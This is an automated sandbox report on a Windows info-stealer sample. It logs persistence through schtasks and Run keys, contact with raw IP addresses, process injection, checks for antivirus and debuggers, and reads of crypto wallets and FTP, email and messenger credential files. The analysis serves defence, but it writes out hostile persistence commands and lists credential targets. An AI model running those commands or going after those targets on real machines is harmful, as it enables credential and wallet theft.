RegOpenKeyExA April 19, 2024, 1:10 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00BA-0409-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000500 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00BA-0409-0000-0000000FF1CE}	1
RegOpenKeyExA April 19, 2024, 1:10 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00E1-0409-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000500 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00E1-0409-0000-0000000FF1CE}	1
RegOpenKeyExA April 19, 2024, 1:10 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00E2-0409-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000500 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00E2-0409-0000-0000000FF1CE}	1
RegOpenKeyExA April 19, 2024, 1:10 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0115-0409-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000500 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0115-0409-0000-0000000FF1CE}	1
RegOpenKeyExA April 19, 2024, 1:10 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0117-0409-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000500 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0117-0409-0000-0000000FF1CE}	1
RegOpenKeyExA April 19, 2024, 1:10 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-012B-0409-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000500 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-012B-0409-0000-0000000FF1CE}	1
RegOpenKeyExA April 19, 2024, 1:10 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{91150000-0011-0000-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000500 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{91150000-0011-0000-0000-0000000FF1CE}	1
RegOpenKeyExA April 19, 2024, 1:10 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4} base_handle: 0x80000002 key_handle: 0x00000500 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}	1
RegOpenKeyExA April 19, 2024, 1:10 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40} base_handle: 0x80000002 key_handle: 0x00000500 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}	1
RegOpenKeyExA April 19, 2024, 1:10 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100} base_handle: 0x80000002 key_handle: 0x00000500 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}	1
RegOpenKeyExA April 19, 2024, 1:10 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{BB8B979E-E336-47E7-96BC-1031C1B94561} base_handle: 0x80000002 key_handle: 0x00000500 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{BB8B979E-E336-47E7-96BC-1031C1B94561}	1

Terminates another process (2 events)

Time & API	Arguments	Status	Return	Repeated
NtTerminateProcess April 19, 2024, 1:11 p.m.	status_code: 0xc0000005 process_identifier: 2816 process_handle: 0x00000000000000bc		0	0
NtTerminateProcess April 19, 2024, 1:11 p.m.	status_code: 0xc0000005 process_identifier: 2816 process_handle: 0x00000000000000bc	1	0	0

Uses Windows utilities for basic Windows functionality (3 events)

cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
cmdline	netsh wlan show profiles
cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST

Communicates with host for which no DNS query was performed (4 events)

host	147.45.47.93
host	193.233.132.167
host	193.233.132.56
host	192.227.146.252

Allocates execute permission to another process indicative of possible code injection (1 event)

Time & API	Arguments	Status	Return	Repeated
NtAllocateVirtualMemory April 19, 2024, 1:10 p.m.	process_identifier: 1572 region_size: 5984256 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000484		3221225496	0

Attempts to identify installed AV products by installation directory (7 events)

file	C:\ProgramData\AVAST Software
file	C:\ProgramData\Avira
file	C:\ProgramData\Kaspersky Lab
file	C:\ProgramData\Panda Security
file	C:\ProgramData\Bitdefender
file	C:\ProgramData\AVG
file	C:\ProgramData\Doctor Web

Checks for the presence of known devices from debuggers and forensic tools (3 events)

file	\??\SICE
file	\??\SIWVID
file	\??\NTICE

Checks for the presence of known windows from debuggers and forensic tools (50 out of 420 events)

Time & API	Arguments	Status	Return	Repeated
FindWindowA April 19, 2024, 1:10 p.m.	class_name: OLLYDBG window_name:		0	0
FindWindowA April 19, 2024, 1:10 p.m.	class_name: GBDYLLO window_name:		0	0
FindWindowA April 19, 2024, 1:10 p.m.	class_name: pediy06 window_name:		0	0
FindWindowA April 19, 2024, 1:10 p.m.	class_name: FilemonClass window_name:		0	0
FindWindowA April 19, 2024, 1:10 p.m.	class_name: FilemonClass window_name:		0	0
FindWindowA April 19, 2024, 1:10 p.m.	class_name: #0 window_name: File Monitor - Sysinternals: www.sysinternals.com		0	0
FindWindowA April 19, 2024, 1:10 p.m.	class_name: PROCMON_WINDOW_CLASS window_name:		0	0
FindWindowA April 19, 2024, 1:10 p.m.	class_name: #0 window_name: Process Monitor - Sysinternals: www.sysinternals.com		0	0
FindWindowA April 19, 2024, 1:10 p.m.	class_name: RegmonClass window_name:		0	0
FindWindowA April 19, 2024, 1:10 p.m.	class_name: RegmonClass window_name:		0	0
FindWindowA April 19, 2024, 1:10 p.m.	class_name: #0 window_name: Registry Monitor - Sysinternals: www.sysinternals.com		0	0
FindWindowA April 19, 2024, 1:10 p.m.	class_name: 18467-41 window_name:		0	0
FindWindowA April 19, 2024, 1:10 p.m.	class_name: FilemonClass window_name:		0	0
FindWindowA April 19, 2024, 1:10 p.m.	class_name: FilemonClass window_name:		0	0
FindWindowA April 19, 2024, 1:10 p.m.	class_name: #0 window_name: File Monitor - Sysinternals: www.sysinternals.com		0	0
FindWindowA April 19, 2024, 1:10 p.m.	class_name: PROCMON_WINDOW_CLASS window_name:		0	0
FindWindowA April 19, 2024, 1:10 p.m.	class_name: #0 window_name: Process Monitor - Sysinternals: www.sysinternals.com		0	0
FindWindowA April 19, 2024, 1:10 p.m.	class_name: OLLYDBG window_name:		0	0
FindWindowA April 19, 2024, 1:10 p.m.	class_name: GBDYLLO window_name:		0	0
FindWindowA April 19, 2024, 1:10 p.m.	class_name: pediy06 window_name:		0	0
FindWindowA April 19, 2024, 1:10 p.m.	class_name: FilemonClass window_name:		0	0
FindWindowA April 19, 2024, 1:10 p.m.	class_name: FilemonClass window_name:		0	0
FindWindowA April 19, 2024, 1:10 p.m.	class_name: #0 window_name: File Monitor - Sysinternals: www.sysinternals.com		0	0
FindWindowA April 19, 2024, 1:10 p.m.	class_name: PROCMON_WINDOW_CLASS window_name:		0	0
FindWindowA April 19, 2024, 1:10 p.m.	class_name: #0 window_name: Process Monitor - Sysinternals: www.sysinternals.com		0	0
FindWindowA April 19, 2024, 1:10 p.m.	class_name: RegmonClass window_name:		0	0
FindWindowA April 19, 2024, 1:10 p.m.	class_name: RegmonClass window_name:		0	0
FindWindowA April 19, 2024, 1:10 p.m.	class_name: #0 window_name: Registry Monitor - Sysinternals: www.sysinternals.com		0	0
FindWindowA April 19, 2024, 1:10 p.m.	class_name: 18467-41 window_name:		0	0
FindWindowA April 19, 2024, 1:10 p.m.	class_name: FilemonClass window_name:		0	0
FindWindowA April 19, 2024, 1:10 p.m.	class_name: FilemonClass window_name:		0	0
FindWindowA April 19, 2024, 1:10 p.m.	class_name: #0 window_name: File Monitor - Sysinternals: www.sysinternals.com		0	0
FindWindowA April 19, 2024, 1:10 p.m.	class_name: PROCMON_WINDOW_CLASS window_name:		0	0
FindWindowA April 19, 2024, 1:10 p.m.	class_name: #0 window_name: Process Monitor - Sysinternals: www.sysinternals.com		0	0
FindWindowA April 19, 2024, 1:10 p.m.	class_name: OLLYDBG window_name:		0	0
FindWindowA April 19, 2024, 1:10 p.m.	class_name: GBDYLLO window_name:		0	0
FindWindowA April 19, 2024, 1:10 p.m.	class_name: pediy06 window_name:		0	0
FindWindowA April 19, 2024, 1:10 p.m.	class_name: OLLYDBG window_name:		0	0
FindWindowA April 19, 2024, 1:10 p.m.	class_name: GBDYLLO window_name:		0	0
FindWindowA April 19, 2024, 1:10 p.m.	class_name: pediy06 window_name:		0	0
FindWindowA April 19, 2024, 1:10 p.m.	class_name: Regmonclass window_name:		0	0
FindWindowA April 19, 2024, 1:10 p.m.	class_name: Regmonclass window_name:		0	0
FindWindowA April 19, 2024, 1:10 p.m.	class_name: 18467-41 window_name:		0	0
FindWindowA April 19, 2024, 1:10 p.m.	class_name: Filemonclass window_name:		0	0
FindWindowA April 19, 2024, 1:10 p.m.	class_name: Filemonclass window_name:		0	0
FindWindowA April 19, 2024, 1:10 p.m.	class_name: PROCMON_WINDOW_CLASS window_name:		0	0
FindWindowA April 19, 2024, 1:10 p.m.	class_name: OLLYDBG window_name:		0	0
FindWindowA April 19, 2024, 1:10 p.m.	class_name: GBDYLLO window_name:		0	0
FindWindowA April 19, 2024, 1:10 p.m.	class_name: pediy06 window_name:		0	0
FindWindowA April 19, 2024, 1:10 p.m.	class_name: OLLYDBG window_name:		0	0

Checks the version of Bios, possibly for anti-virtualization (2 events)

registry	HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion
registry	HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion

Checks the CPU name from registry, possibly for anti-virtualization (1 event)

registry

HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString

Installs itself for autorun at Windows startup (7 events)

reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\ce7dc404a0.exe	reg_value	C:\Users\test22\AppData\Local\Temp\1000055001\ce7dc404a0.exe
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\c2e58d8472.exe	reg_value	C:\Users\test22\AppData\Local\Temp\1000056001\c2e58d8472.exe
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\RageMP131	reg_value	C:\Users\test22\AppData\Local\RageMP131\RageMP131.exe
file	C:\Windows\Tasks\chrosha.job
file	C:\Windows\Tasks\explorha.job
cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST

Attempts to access Bitcoin/ALTCoin wallets (2 events)

file	C:\Users\test22\AppData\Roaming\Electrum\wallets
file	C:\Users\test22\AppData\Roaming\Litecoin\wallets

Harvests credentials from local FTP client softwares (3 events)

file	C:\Users\test22\AppData\Roaming\GHISLER\wcx_ftp.ini
file	C:\Users\test22\AppData\Roaming\FileZilla\sitemanager.xml
registry	HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Harvests information related to installed instant messenger clients (16 events)

file	C:\Windows\.purple\accounts.xml
file	C:\Python27\.purple\accounts.xml
file	C:\Windows\System32\.purple\accounts.xml
file	C:\Program Files (x86)\Google\Chrome\Application\.purple\accounts.xml
file	C:\Users\test22\AppData\Local\Temp\1000056001\.purple\accounts.xml
file	C:\.purple\accounts.xml
file	C:\Users\test22\AppData\Local\Temp\09fd851a4f\.purple\accounts.xml
file	C:\SystemRoot\System32\.purple\accounts.xml
file	C:\Program Files (x86)\Internet Explorer\.purple\accounts.xml
file	C:\Windows\Microsoft.NET\Framework\v4.0.30319\.purple\accounts.xml
file	C:\Program Files (x86)\Microsoft Office\Office15\.purple\accounts.xml
file	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\.purple\accounts.xml
file	C:\Users\test22\AppData\Roaming\.purple\accounts.xml
file	C:\Windows\SysWOW64\.purple\accounts.xml
file	C:\Program Files (x86)\EditPlus\.purple\accounts.xml
file	C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE15\.purple\accounts.xml

Manipulates memory of a non-child process indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2264 manipulating memory of non-child process 1572
NtAllocateVirtualMemory April 19, 2024, 1:10 p.m.	process_identifier: 1572 region_size: 5984256 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000484		3221225496	0

Collects information about installed applications (38 events)

Time & API	Arguments	Status
RegQueryValueExA April 19, 2024, 1:10 p.m.	key_handle: 0x00000500 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 7-Zip 20.02 alpha regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip\DisplayName	1
RegQueryValueExA April 19, 2024, 1:10 p.m.	key_handle: 0x00000500 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe AIR regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Adobe AIR\DisplayName	1
RegQueryValueExA April 19, 2024, 1:10 p.m.	key_handle: 0x00000500 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: EditPlus regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus\DisplayName	1
RegQueryValueExA April 19, 2024, 1:10 p.m.	key_handle: 0x00000500 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Chrome regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayName	1
RegQueryValueExA April 19, 2024, 1:10 p.m.	key_handle: 0x00000500 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: ????? ?? 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean\DisplayName	1
RegQueryValueExA April 19, 2024, 1:10 p.m.	key_handle: 0x00000500 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Mozilla Thunderbird 78.4.0 (x86 ko) regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Thunderbird 78.4.0 (x86 ko)\DisplayName	1
RegQueryValueExA April 19, 2024, 1:10 p.m.	key_handle: 0x00000500 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Professional Plus 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Office15.PROPLUSR\DisplayName	1
RegQueryValueExA April 19, 2024, 1:10 p.m.	key_handle: 0x00000500 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe AIR regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}\DisplayName	1
RegQueryValueExA April 19, 2024, 1:10 p.m.	key_handle: 0x00000500 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: HttpWatch Professional 9.3.39 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}\DisplayName	1
RegQueryValueExA April 19, 2024, 1:10 p.m.	key_handle: 0x00000500 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: ????? ?? 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}\DisplayName	1
RegQueryValueExA April 19, 2024, 1:10 p.m.	key_handle: 0x00000500 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Java 8 Update 131 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F32180131F0}\DisplayName	1
RegQueryValueExA April 19, 2024, 1:10 p.m.	key_handle: 0x00000500 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Java Auto Updater regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{4A03706F-666A-4037-7777-5F2748764D10}\DisplayName	1
RegQueryValueExA April 19, 2024, 1:10 p.m.	key_handle: 0x00000500 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Google Update Helper regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}\DisplayName	1
RegQueryValueExA April 19, 2024, 1:10 p.m.	key_handle: 0x00000500 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Access MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0015-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA April 19, 2024, 1:10 p.m.	key_handle: 0x00000500 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Excel MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0016-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA April 19, 2024, 1:10 p.m.	key_handle: 0x00000500 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft PowerPoint MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0018-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA April 19, 2024, 1:10 p.m.	key_handle: 0x00000500 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Publisher MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0019-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA April 19, 2024, 1:10 p.m.	key_handle: 0x00000500 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Outlook MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001A-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA April 19, 2024, 1:10 p.m.	key_handle: 0x00000500 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Word MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001B-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA April 19, 2024, 1:10 p.m.	key_handle: 0x00000500 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proofing Tools 2013 - English regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA April 19, 2024, 1:10 p.m.	key_handle: 0x00000500 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Outils de vérification linguistique 2013 de Microsoft Office - Français regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-040C-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA April 19, 2024, 1:10 p.m.	key_handle: 0x00000500 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proofing Tools 2013 - Español regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-0C0A-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA April 19, 2024, 1:10 p.m.	key_handle: 0x00000500 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proofing (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-002C-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA April 19, 2024, 1:10 p.m.	key_handle: 0x00000500 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft InfoPath MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0044-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA April 19, 2024, 1:10 p.m.	key_handle: 0x00000500 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Shared MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-006E-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA April 19, 2024, 1:10 p.m.	key_handle: 0x00000500 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft DCF MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0090-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA April 19, 2024, 1:10 p.m.	key_handle: 0x00000500 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft OneNote MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00A1-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA April 19, 2024, 1:10 p.m.	key_handle: 0x00000500 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Groove MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00BA-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA April 19, 2024, 1:10 p.m.	key_handle: 0x00000500 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office OSM MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00E1-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA April 19, 2024, 1:10 p.m.	key_handle: 0x00000500 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office OSM UX MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00E2-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA April 19, 2024, 1:10 p.m.	key_handle: 0x00000500 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Shared Setup Metadata MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0115-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA April 19, 2024, 1:10 p.m.	key_handle: 0x00000500 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Access Setup Metadata MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0117-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA April 19, 2024, 1:10 p.m.	key_handle: 0x00000500 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Lync MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-012B-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA April 19, 2024, 1:10 p.m.	key_handle: 0x00000500 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Professional Plus 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{91150000-0011-0000-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA April 19, 2024, 1:10 p.m.	key_handle: 0x00000500 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe Flash Player 13 ActiveX regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}\DisplayName	1
RegQueryValueExA April 19, 2024, 1:10 p.m.	key_handle: 0x00000500 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe Flash Player 13 NPAPI regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}\DisplayName	1
RegQueryValueExA April 19, 2024, 1:10 p.m.	key_handle: 0x00000500 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe Acrobat Reader DC MUI regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}\DisplayName	1
RegQueryValueExA April 19, 2024, 1:10 p.m.	key_handle: 0x00000500 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{d992c12e-cab2-426f-bde3-fb8c53950b0d}\DisplayName	1

Harvests credentials from local email clients (5 events)

file	C:\Users\test22\AppData\Roaming\ICQ\0001
file	C:\Users\test22\AppData\Roaming\Thunderbird\profiles.ini
registry	HKEY_CURRENT_USER\Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676
registry	HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
registry	HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001

Attempts to create or modify system certificates (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F81F111D0E5AB58D396F7BF525577FD30FDC95AA\Blob

One or more non-whitelisted processes were created (2 events)

parent_process	chrome.exe				martian_process	"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1032,15907650265161917128,18348153160346787762,131072 --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=840 /prefetch:2
